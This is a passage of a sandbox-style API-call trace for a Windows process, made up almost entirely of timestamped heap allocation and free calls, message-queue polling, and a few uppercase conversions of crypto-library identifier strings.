[0146.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0146.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0146.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0146.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0146.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0146.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0146.247] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.247] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0146.397] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0146.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0146.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0146.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0146.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0146.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0146.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0146.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0146.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0146.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0146.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2ea3f90 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0146.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0146.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0146.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2eb7be8 [0146.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3f90 | out: hHeap=0x970000) returned 1 [0146.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0146.404] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0146.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0146.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.405] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0146.405] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0146.405] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0146.405] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0146.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0146.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0146.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0146.406] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0146.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0146.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0146.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0146.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0146.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0146.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0146.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0146.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0146.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0146.415] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0146.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0146.415] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0146.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0146.416] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0146.416] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0146.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0146.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0146.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0146.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0146.417] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0146.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0146.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0146.418] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0146.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0146.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0146.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0146.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0146.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0146.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0146.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0146.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0146.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0146.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0146.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2ea3f90 [0146.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0146.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0146.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2ecb840 [0146.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0146.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0146.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3f90 | out: hHeap=0x970000) returned 1 [0146.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0146.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0146.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0146.424] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0146.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0146.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2ea3f90 [0146.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ecb840 | out: hHeap=0x970000) returned 1 [0146.431] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0146.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0146.431] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13c50) returned 0x2ecb840 [0146.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3f90 | out: hHeap=0x970000) returned 1 [0146.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0146.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0146.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0146.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0146.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0146.435] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0146.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0146.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0146.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0146.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0146.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e90338 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0146.438] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0146.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0146.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0146.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0146.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0146.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2b8b8 | out: hHeap=0x970000) returned 1 [0146.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0146.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0146.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0146.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0146.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0146.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb7be8 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0146.506] HeapFree (in: hHeap=0x970000, 